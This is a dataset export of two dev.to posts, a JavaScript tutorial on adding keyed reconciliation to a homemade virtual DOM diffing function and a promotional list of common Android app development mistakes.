1,411,967 | Adding keys to our DOM diffing algorithm | In my previous post about DOM diffing algorithm we learned to create our own virtual DOM and got to... | 0 | 2023-03-23T07:02:08 | https://dev.to/joydeep-bhowmik/adding-keys-our-dom-diffing-algorithm-4d7g | javascript, webdev, tutorial, react | In my [previous post](https://dev.to/joydeep23/virtual-dom-diffing-algorithm-implementation-in-vanilla-javascript-2324) about DOM diffing algorithm we learned to create our own virtual DOM and got to know how DOM diffing actually works. In this post we will learn about how keys works and how we can add this feature to our virtual DOM . before we start the actual coding we must know why keys are necessary and whats the concept behind it.
## Importance of using keys
Keys tell our diffing algorithm to identify which items needs to be changed, or add, or remove.
Without keys our algorithm will push update to a node even if we could achieve the same by simple moving the node. Let me explain this with an example
```
|-------DOM-------------|---------VDOM--------|
|-----------------------|---------------------|
| <Li val="A"> | <Li val="A"> |
| <Li val="B"> | <Li val="B"> |
| | <Li val="C"> |
|-----------------------|---------------------|
```
When we compare this DOM with the VDOM our algorithm just append the last child to our DOM. That's not a problem at all . The problems occurs when we face situation like this.
```
|-------DOM-------------|---------VDOM--------|
|-----------------------|---------------------|
| <Li val="A"> | <Li val="c"> |
| <Li val="B"> | <Li val="A"> |
| | <Li val="B"> |
|-----------------------|---------------------|
```
In this case our algorithm will append the last node to our DOM and update the first node. But we could have just simply avoided this by prepending the last node to the DOM , and this would make the update much faster. That's where the keys come in.
```
|---------DOM-----------|-------VDOM----------|--------------------------|
| <Li key=1 val="A"> | <Li key=3 val="C"> | Moved from bottom to top |
| <Li key=2 val="B"> | <Li key=2 val="A"> | None |
| | <Li key=1 val="B"> | None |
|-----------------------|---------------------|--------------------------|
```
With the help of keys now we can tell our algorithm that no need to change everything just add the new node to the top.
## Implementation
The implementation starts by simply adding the key attributes to our nodes, however the key attributes never get passed to DOM, but stays as a property of the node object.
Let's modify our previous codes to add key props. starting with clean function.
```javascript
function clean(node) {
for (let n = 0; n < node.childNodes.length; n++) {
let child = node.childNodes[n];
if (child.nodeType === 8 ||(child.nodeType === 3 && !/\S/.test(child.nodeValue) && child.nodeValue.includes('\n')))
{
node.removeChild(child);
n--;
} else if (child.nodeType === 1) {
if(child.hasAttribute('key')){
let key=child.getAttribute('key');
//adding the key property to the node object
child.key=key;
//removing the keys
child.removeAttribute('key');
}
clean(child);
}
}
}
```
As our clean function iterates through all children we check if the node has the key attribute , if the case is true then we get the attribute value and set a key property with the value, then we remove the key attribute.
Now All of our nodes has the key property. Lets create our patchKeys function
```javascript
function patchKeys(vdom,dom){
//remove unmatched keys from dom
for(let i=0;i<dom.children.length;i++){
let dnode=dom.children[i];
let key=dnode.key;
if(key){
if(!hasTheKey(vdom,key)){
dnode.remove();
}
}
}
//adding keys to dom
for(let i=0;i<vdom.children.length;i++){
let vnode=vdom.children[i];
let key=vnode.key;
if(key){
if(!hasTheKey(dom,key)){
//if key is not present in dom then add it
//get the index of current node
let nthIndex=[].indexOf.call(vnode.parentNode.children, vnode);
if(dom.children[nthIndex]){
//adding before the same indexed node of dom
dom.children[nthIndex].before(vnode.cloneNode(true))
}else{
dom.append(vnode.cloneNode(true))
}
}
}
}
}
```
In the patchKey function we iterate through the DOM and VDOM children. For DOM children if the key is not present in VDOM we remove the node from DOM and for VDOM children if the key is not present the DOM then we add it to the DOM, While adding a node to The DOM we need to maintain the ordering, for this we get the index of the VNODE and add it before the same indexed child of DOM, if the child is not present in DOM we just append the VNODE.
The hasKey function helps us to check if the key is present in the respective DOM.
```javascript
function hasTheKey(dom,key){
let keymatched=false;
for(let i=0;i<dom.children.length;i++){
//if the key is present the break theloop
if(key==dom.children[i].key) {
//update the keymacthed status
keymatched=true;
break};
}
return keymatched;
}
```
In the hasKey function we iterate thought a Parent Nodes children to check if the desired key is present, the function returns true/false accordingly.
Now all we need is to add this to our diff function
```javascript
function diff(vdom, dom) {
//if dom has no childs then append the childs from vdom
if (dom.hasChildNodes() == false && vdom.hasChildNodes() == true) {
//codes
} else {
patchKeys(vdom,dom);
//codes
}
}
```
Now this is our Whole code after adding the key feature
```javascript
function getnodeType(node) {
if(node.nodeType==1) return node.tagName.toLowerCase();
else return node.nodeType;
};
function clean(node) {
for (let n = 0; n < node.childNodes.length; n++) {
let child = node.childNodes[n];
if (child.nodeType === 8 ||(child.nodeType === 3 && !/\S/.test(child.nodeValue) && child.nodeValue.includes('\n')))
{
node.removeChild(child);
n--;
} else if (child.nodeType === 1) {
if(child.hasAttribute('key')){
let key=child.getAttribute('key');
child.key=key;
child.removeAttribute('key');
}
clean(child);
}
}
}
function parseHTML(str) {
let parser = new DOMParser();
let doc = parser.parseFromString(str, 'text/html');
clean(doc.body);
return doc.body;
}
function attrbutesIndex(el) {
var attributes = {};
if (el.attributes == undefined) return attributes;
for (var i = 0, atts = el.attributes, n = atts.length; i < n; i++) {
attributes[atts[i].name] = atts[i].value;
}
return attributes;
}
function patchAttributes(vdom, dom) {
let vdomAttributes = attrbutesIndex(vdom);
let domAttributes = attrbutesIndex(dom);
if (vdomAttributes == domAttributes) return;
Object.keys(vdomAttributes).forEach((key, i) => {
//if the attribute is not present in dom then add it
if (!dom.getAttribute(key)) {
dom.setAttribute(key, vdomAttributes[key]);
} //if the atrtribute is present than compare it
else if (dom.getAttribute(key)) {
if (vdomAttributes[key] != domAttributes[key]) {
dom.setAttribute(key, vdomAttributes[key]);
}
}
});
Object.keys(domAttributes).forEach((key, i) => {
//if the attribute is not present in vdom than remove it
if (!vdom.getAttribute(key)) {
dom.removeAttribute(key);
}
});
}
function hasTheKey(dom,key){
let keymatched=false;
for(let i=0;i<dom.children.length;i++){
if(key==dom.children[i].key) {
keymatched=true;
break};
}
return keymatched;
}
function patchKeys(vdom,dom){
//remove unmatched keys from dom
for(let i=0;i<dom.children.length;i++){
let dnode=dom.children[i];
let key=dnode.key;
if(key){
if(!hasTheKey(vdom,key)){
dnode.remove();
}
}
}
//adding keys to dom
for(let i=0;i<vdom.children.length;i++){
let vnode=vdom.children[i];
let key=vnode.key;
if(key){
if(!hasTheKey(dom,key)){
//if key is not present in dom then add it
let nthIndex=[].indexOf.call(vnode.parentNode.children, vnode);
if(dom.children[nthIndex]){
dom.children[nthIndex].before(vnode.cloneNode(true))
}else{
dom.append(vnode.cloneNode(true))
}
}
}
}
}
function diff(vdom, dom) {
//if dom has no childs then append the childs from vdom
if (dom.hasChildNodes() == false && vdom.hasChildNodes() == true) {
for (var i = 0; i < vdom.childNodes.length; i++) {
//appending
dom.append(vdom.childNodes[i].cloneNode(true));
}
} else {
patchKeys(vdom,dom);
//if dom has extra child
if (dom.childNodes.length > vdom.childNodes.length) {
let count = dom.childNodes.length - vdom.childNodes.length;
if (count > 0) {
for (; count > 0; count--) {
dom.childNodes[dom.childNodes.length - count].remove();
}
}
}
//now comparing all childs
for (var i = 0; i < vdom.childNodes.length; i++) {
//if the node is not present in dom append it
if (dom.childNodes[i] == undefined) {
dom.append(vdom.childNodes[i].cloneNode(true));
// console.log("appenidng",vdom.childNodes[i])
} else if (getnodeType(vdom.childNodes[i]) == getnodeType(dom.childNodes[i])) {
//if same node type
//if the nodeType is text
if (vdom.childNodes[i].nodeType == 3) {
//we check if the text content is not same
if (vdom.childNodes[i].textContent != dom.childNodes[i].textContent) {
//replace the text content
dom.childNodes[i].textContent = vdom.childNodes[i].textContent;
}
}else {
patchAttributes(vdom.childNodes[i], dom.childNodes[i])
}
} else {
//replace
dom.childNodes[i].replaceWith(vdom.childNodes[i].cloneNode(true));
}
if(vdom.childNodes[i].nodeType != 3){
diff(vdom.childNodes[i], dom.childNodes[i])
}
}
}
}
```
Lets see if it works.
```javascript
|-------DOM-------------|--------VDOM---------|--------action------------|
| <Li key=1 val="1"> | <Li key=1 val="1"> | Node |
| <Li key=2 val="2"> | <Li key=3 val="3"> | Add this before key 2 |
| | <Li key=2 val="2"> | Node |
|-----------------------|---------------------|--------------------------|
```
```html
<div id="node">
<ul>
<li key="1">1</li>
<li key="2">2</li>
</ul>
</div>
<button>Diff</button>
<script>
let vdom = parseHTML(`
<ul>
<li key="1">1</li>
<li key="3">3</li>
<li key="2">2</li>
</ul>`);
let dom = document.getElementById('node');
clean(dom);
document.querySelector('button').addEventListener('click',function(){
diff(vdom,dom);
})
</script>
```
## The result

> IF you are interested in this type of posts please check out my
> [blog](https://codegleam.in)<br> | joydeep-bhowmik |
1,412,007 | 10 Things to Consider While Android App Development! | To Take your startup or a mid-sized business to the next level, your products must provide the best... | 0 | 2023-03-23T08:08:30 | https://dev.to/quokkalabs/10-things-to-consider-while-android-app-development-20g9 | android, mobile, github, api | To Take your startup or a mid-sized business to the next level, your products must provide the best user experience. On the other hand, the marketing and mobile apps you provide should be good enough to attract new customers to your business. And all it needs is good android app development to take it to the next level.
Now the question is, how to make your android application development good enough? The solution is to avoid common mistakes and provide some advice to consider while developing the app. All it needs a good development and a good android app development company to make it worth it.
So, let's start this blog without wasting a single worthy second!!! But wait, before going ahead, if you want to save time and some super-fast results in your android app development, [hire Android app developers](https://quokkalabs.com/hire-android-developer?utm_source=Dev.to&utm_medium=blog&utm_campaign=Hire) for your app now!
# 10 Things to Consider While Android App Development!
Let's start with the first but very critical point to consider.
## Memory Leaks in Android App Development
Memory leaks occur when an app allocates memory but fails to release it when it is no longer needed. It can result in a shortage of system memory, which can slow down the app or cause it to crash. To avoid memory leaks, the Android app developer must ensure that objects are released when they are no longer needed and use tools such as Android Memory Profiler and MAT (Memory Analyzer Tool) to identify and eliminate memory leaks.
If avoided, it can be costly for you; to make it safer, you can contact an android app development company or hire an android developer for a particular project, never to make it happen again.
Now let's see the next point!
## Not Optimizing App for Different Screen Sizes
Not optimizing the app for different screen sizes can result in UI elements being cut off, causing visual inconsistencies and affecting the user experience. To avoid this mistake, the Android app developer must design the app's UI to be responsive and scalable, using "ConstraintLayout" and "RecyclerView" to accommodate different screen sizes and resolutions.
A good android app development company always considers this for the best UX; even if you hire Android app developers from a good source, they consider it too.
Now, let's see the following point!
## Not Following Design Guidelines (The Biggest Mistake in Android App Development)
Android has strict design guidelines that must be followed to ensure a consistent user experience. Not following the design guidelines can result in UI inconsistencies, causing users to feel confused and frustrated. The Android app developer must follow the Material Design guidelines and use appropriate color schemes, typography, and animations to avoid this mistake. You should contact a best android app development company to get everything done bug-free.
Read More: {% embed https://medium.com/@quokkalabs135/what-is-material-design-why-to-use-material-design-58bfa97d2bf %}
Also, Read: {% embed https://dev.to/quokkalabs/material-design-3-all-you-need-to-know-about-the-googles-design-system-dp3 %}
## Ignoring App Permissions (Another Critical Mistake in Android App Development)
Ignoring app permissions can result in security issues and user privacy violations. Developers must ensure that the app asks for approval only when required and explain why it is needed to the user. They must also ensure the app handles permission requests gracefully and responds to permission denials.
If you Hire Android app developers, make sure they know the basic rules too!
## Not Handling Network Connectivity Issues
Not handling network connectivity issues can result in the app becoming unresponsive or crashing. Android app developer must address network connectivity issues, such as network errors, timeouts, and connectivity loss, using appropriate error messages and retry mechanisms. They must also ensure the app does not block the UI thread while waiting for network responses.
## Not Following MVC or MVP Architecture
Not following MVC (Model-View-Controller) or MVP (Model-View-Presenter) architecture can result in unmanageable, hard-to-maintain code that leads to development issues in the future. Developers must choose the appropriate architecture based on the app's requirements and follow best practices, such as separating business logic and UI concerns and avoiding tight coupling.
## Hard-Coding Values in Android App Development
Hard-coding values can result in inflexible code that is hard to modify and maintain. So, complex coding values must be avoided, such as string resources, color values, and layout dimensions, and use appropriate resources and values in the app. Android app developer must also ensure that the app's resources are externalized and can be easily modified.
Hire Android app developers from good sources to avoid such problems quickly!
## Not Testing the App Thoroughly – The Major Mistake in Android App Development
Not testing the app thoroughly can result in bugs, crashes, and usability issues that frustrate users. Developers must thoroughly test the app, including unit, integration, and UI testing. In this case, the Android app developer must also test the app on various devices, screen sizes, and OS versions and use tools such as Espresso and Appium to automate testing.
Also, developers must ensure that the app is accessible to users with disabilities and meets the target audience's requirements.
## Not Handling Configuration Changes
Not handling configuration changes can result in an app that crashes when the device orientation changes or the keyboard is opened; to solve this, orientation changes, keyboard visibility, and language changes must be applied to ensure that the app remains stable and responsive.
## Not Using Appropriate Data Structures
Not using appropriate data structures can result in slow, inefficient code that affects the app's performance. Android app developers must use appropriate data structures such as ‘’ArrayList’’, ‘’HashMap’’, and ‘’LinkedList’’ based on the app's requirements and use them wisely to optimize performance.
## Few Other Technical Things to Watch Out for While Android App Development
So, these were the most common happening errors in android app development. But it's not the end of the blog; I have specially collected some more mistakes that happened to me and can be helpful to you! So, let's look at those errors as fast as possible.
### Not Using the Latest APIs and SDKs
Not using the latest APIs and SDKs can result in an incompatible app with the latest Android OS versions and devices.
### Not Handling Memory Efficiently
Not handling memory efficiently can result in an app that consumes too much memory and affects the app's performance.
### Not Using the Latest APIs and SDKs
Not using the latest APIs and SDKs can result in an incompatible app with the latest Android OS versions and devices.
### Not Using Proper Threading Techniques
Not using proper threading techniques can result in an unresponsive, slow, and unstable app.
### Not Considering Internationalization
Not considering internationalization can result in an app that is not accessible to users from different countries and cultures.
## Some FAQs That May Help You!
### How To Build an Android App?
In short, to build an Android app, you should first define and design your app idea using tools like Sketch or Figma. Then, choose your development environment, like Android Studio, and set it up by installing the Android SDK. Finally, start coding and testing your app, and publish it on the Google Play Store once it's ready.
### How To Build an Android App for Beginners?
To build an Android app for beginners, you should first learn Java or Kotlin, the two main programming languages for Android app development. Then, you can use Android Studio, the official IDE for Android app development, to create your app's user interface and start coding. Finally, test your app and publish it on the Google Play Store.
### Which 5 Things That Make a Good App?
A good app can be a game-changer for the user and the developer. To make a good app, there are several factors to consider. Here are five things that can make a good app:
- User Interface (UI) Design
- Performance
- Functionality
- Security
- Support
## Final Words
Mastering Android app development requires careful consideration of key factors that pave the way for success. Developers can ensure their apps stand out in the competitive market by understanding the importance of thorough planning, user-centric design, efficient coding practices, and staying up-to-date with the latest Android trends. Also, they must leverage the power of cloud technologies, optimizing app performance, prioritizing security and privacy, and embracing continuous improvement through user feedback and analytics are essential for delivering high-quality Android applications.
Remember, becoming a proficient Android app developer is a continuous learning process. By implementing these ten key factors and continuously honing your skills, you'll be well on your way to creating remarkable Android apps that captivate users, drive engagement, and achieve long-term success in the dynamic world of mobile app development. So, embrace the challenge, stay curious, and keep pushing the boundaries of what's possible in the exciting realm of [Android app development](https://quokkalabs.com/?utm_source=Dev.to&utm_medium=blog&utm_campaign=Home)!
Wasting time thinking means increasing competitors in the market!
Thanks for reading!
| labsquokka |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.